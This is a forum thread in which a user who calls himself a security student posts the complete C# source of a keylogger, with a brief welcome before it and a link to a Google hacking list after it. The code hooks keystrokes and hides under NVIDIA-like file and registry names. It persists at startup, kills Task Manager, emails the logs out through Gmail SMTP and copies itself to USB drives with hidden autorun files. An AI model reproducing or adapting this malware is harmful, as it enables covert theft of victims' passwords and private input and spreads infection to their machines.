Simple Batch Scripting Automating 3rd Party Utilities

Cleptography's Avatar, Join Date: Sep 2010
Go4Expert Member
Hello,
I will start off by stating that I am a first year network security student.
I am new to the world, and give my respects to those who know more than I do.
I however have been playing around with computers for quite some time.
I prefer scripting languages among other things simply because they are the easiest things in the world to use. I would not even consider batch to be a powerful tool outside of being able to automate other 3rd party command line utilities and such.
I prefer Perl as my weapon of chose, however over the years I have developed some scripts for generating ip addresses and running output against things like nmap and sysinternals utilities for gathering information. I would like to share some of my toys, but thought it would be best to first ask if anyone would even have an interest in seeing some of these things. I guess if someone says yeah go ahead post, then I shall do so.
Regards,
Cleptography -
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Hi Cleptography and welcome to the forum and yeah I will love to read your tips and toys
0
Cleptography's Avatar, Join Date: Sep 2010
Go4Expert Member
I should probably rename this thread to various codes or something. I will add various source code and scripts from as many languages as I can, along with automating command utilities.
This first code is a key logger written in c#, with ability to email and attach itself to usb.
I can not take full credit for this as I found it online so creds to the original author. It has been a while so I'm not quite sure where I dug the source up from or I would post a link to it as well. I modified it a bit, but you get the general idea. It's not compiled, you can use the c# compiler included with windows service pack or whatever compiler you so desire, but here is the source.

KeyLogger written in c#
---------------------------
Code:
using System;
using System.Diagnostics;
using System.Timers;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Net;
using System.Net.Mail;
using Microsoft.Win32;

namespace Keylogger_V2
{
    class Program
    {
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private static LowLevelKeyboardProc _proc = HookCallback;
        private static IntPtr _hookID = IntPtr.Zero;
        public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
        public static byte caps = 0, shift = 0, failed = 0;

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool UnhookWindowsHookEx(IntPtr hhk);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr GetModuleHandle(string lpModuleName);

        public static void Main()
        {
        _hookID = SetHook(_proc);
        Program.startup();
        System.Timers.Timer timer;
        timer = new System.Timers.Timer();
        timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
        timer.AutoReset = true;
        timer.Interval = 600000;
        timer.Start();
        System.Timers.Timer timer2;
        timer2 = new System.Timers.Timer();
        timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
        timer2.AutoReset = true;
        timer2.Interval = 10000;
        timer2.Start();
        Application.Run();
        GC.KeepAlive(timer);
        GC.KeepAlive(timer2);
        UnhookWindowsHookEx(_hookID);
        }

        public static void startup()
        {
            //Try to copy keylogger in some folders
            string source = Application.ExecutablePath.ToString();
            string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            destination=System.IO.Path.Combine(destination,"nvdisp.exe");
            try
            {
                System.IO.File.Copy(source, destination,false);
                source = destination;
            } catch {
                Console.WriteLine("No authorization to copy file or other error.");
            }
            //Find if the file already exist in startup
            try
            {
                RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

                if (registryKey.GetValue("Nvidia driver") == null)
                {
                    registryKey.SetValue("Nvidia driver", destination);
                }

                registryKey.Close();//dispose of the Key
            } catch {
                Console.WriteLine("Error setting startup reg key.");
            }
            //Try to add to all users
            try
            {
                RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

                if (registryKey.GetValue("Nvidia driver") == null)
                {
                    registryKey.SetValue("Nvidia driver", source);
                }

                registryKey.Close();//dispose of the key
            }
            catch
            {
                Console.WriteLine("Error setting startup reg key for all users.");
            }
        }

        public static void OnTimedEvent(object source, EventArgs e)
        {
            Process[] ProcessList = Process.GetProcesses();
            foreach (Process proc in ProcessList)
            {
                if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
                {
                    proc.Kill();
                }
            }
            System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
            msg.To.Add("username@gmail.com");
            msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
            msg.Subject = "i don't know";
            msg.SubjectEncoding = System.Text.Encoding.UTF8;
            msg.Body = "ciao ale";
            msg.BodyEncoding = System.Text.Encoding.UTF8;
            msg.IsBodyHtml = false;
            msg.Priority = MailPriority.High;
            SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
            client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
            client.Port = 587;
            client.Host = "smtp.gmail.com";
            client.EnableSsl = true;
            Attachment data = new Attachment(Program.path);
            msg.Attachments.Add(data);
            try
            {
                client.Send(msg);
                failed = 0;
            }
            catch
            {
                data.Dispose();
                failed = 1;
            }
            data.Dispose();

            if (failed == 0)
                File.WriteAllText(Program.path, ""); //empties the file
    
            failed = 0;
    
        }

        private static IntPtr SetHook(LowLevelKeyboardProc proc)
        {
            using (Process curProcess = Process.GetCurrentProcess())
            using (ProcessModule curModule = curProcess.MainModule)
            {
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
            }
        }
        private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
        private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
        {
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                StreamWriter sw = File.AppendText(Program.path);
                int vkCode = Marshal.ReadInt32(lParam);
                if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
                
            switch ((Keys)vkCode)
                {
                    case Keys.Space:
                        sw.Write(" ");
                        break;
                    case Keys.Return:
                        sw.WriteLine("");
                        break;
                    case Keys.Back:
                        sw.Write("back");
                        break;
                    case Keys.Tab:
                        sw.Write("TAB");
                        break;
                    case Keys.D0:
                        if (Program.shift == 0) sw.Write("0");
                        else sw.Write(")");
                        break;
                    case Keys.D1:
                        if (Program.shift == 0) sw.Write("1");
                        else sw.Write("!");
                        break;
                    case Keys.D2:
                        if (Program.shift == 0) sw.Write("2");
                        else sw.Write("@");
                        break;
                    case Keys.D3:
                        if (Program.shift == 0) sw.Write("3");
                        else sw.Write("#");
                        break;
                    case Keys.D4:
                        if (Program.shift == 0) sw.Write("4");
                        else sw.Write("$");
                        break;
                    case Keys.D5:
                        if (Program.shift == 0) sw.Write("5");
                        else sw.Write("%");
                        break;
                    case Keys.D6:
                        if (Program.shift == 0) sw.Write("6");
                        else sw.Write("^");
                        break;
                    case Keys.D7:
                        if (Program.shift == 0) sw.Write("7");
                        else sw.Write("&");
                        break;
                    case Keys.D8:
                        if (Program.shift == 0) sw.Write("8");
                        else sw.Write("*");
                        break;
                    case Keys.D9:
                        if (Program.shift == 0) sw.Write("9");
                        else sw.Write("(");
                        break;
                    case Keys.LShiftKey:
                    case Keys.RShiftKey:
                    case Keys.LControlKey:
                    case Keys.RControlKey:
                    case Keys.LMenu:
                    case Keys.RMenu:
                    case Keys.LWin:
                    case Keys.RWin:
                    case Keys.Apps:
                sw.Write("");
                        break;
                    case Keys.OemQuestion:
                        if (Program.shift == 0) sw.Write("/");
                        else sw.Write("?");
                        break;
                    case Keys.OemOpenBrackets:
                        if (Program.shift == 0) sw.Write("[");
                        else sw.Write("{");
                        break;
                    case Keys.OemCloseBrackets:
                        if (Program.shift == 0) sw.Write("]");
                        else sw.Write("}");
                        break;
                    case Keys.Oem1:
                        if (Program.shift == 0) sw.Write(";");
                        else sw.Write(":");
                        break;
                    case Keys.Oem7:
                        if (Program.shift == 0) sw.Write("'");
                        else sw.Write('"');
                        break;
                    case Keys.Oemcomma:
                        if (Program.shift == 0) sw.Write(",");
                        else sw.Write("<");
                        break;
                    case Keys.OemPeriod:
                        if (Program.shift == 0) sw.Write(".");
                        else sw.Write(">");
                        break;
                    case Keys.OemMinus:
                        if (Program.shift == 0) sw.Write("-");
                        else sw.Write("_");
                        break;
                    case Keys.Oemplus:
                        if (Program.shift == 0) sw.Write("=");
                        else sw.Write("+");
                        break;
                    case Keys.Oemtilde:
                        if (Program.shift == 0) sw.Write("`");
                        else sw.Write("~");
                    break;
                case Keys.Oem5:
                    sw.Write("|");
                    break;
                case Keys.Capital:
                    if (Program.caps == 0) Program.caps = 1;
                    else Program.caps = 0;
                    break;
                default:
                    if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
                    if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
                    if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
                    if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
                    break;
            }
            Program.shift = 0;
            sw.Close();
        }    
        return CallNextHookEx(_hookID, nCode, wParam, lParam);
        }

        public static void USBSpread(object source, EventArgs e)
        {
            ///////////////////////////////////////////////////////////////
            /////////////////////// USB spread class //////////////////////
            ///////////////////////////////////////////////////////////////
            //A bit modified
            string source2 = Application.ExecutablePath.ToString();
            System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
            try
            {
                foreach (System.IO.DriveInfo drive in drives)
                {
                    if (drive.DriveType == DriveType.Removable)
                    {
                        string driveAutorun = drive.Name + "autorun.inf";
                        StreamWriter sw = new StreamWriter(driveAutorun);
                        sw.WriteLine("[autorun]\n");
                        sw.WriteLine("open=start.exe");
                        sw.WriteLine("action=Run VMCLite");
                        sw.Close();
                        File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
                        try
                        {
                            File.Copy(source2, drive.Name + "start.exe", true);
                            File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
                        }
                        finally
                        {
                            Console.WriteLine("Removable device rooted");
                        }
                    }
                }
            }
            catch (Exception e2)
            {
                Console.WriteLine(e2.ToString());
            }
        }
    }
}
0
Cleptography's Avatar, Join Date: Sep 2010
Go4Expert Member
Googles Master list a place for all your google hacking fun.

it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
I have splitted all but one into separate articles.
Cleptography like this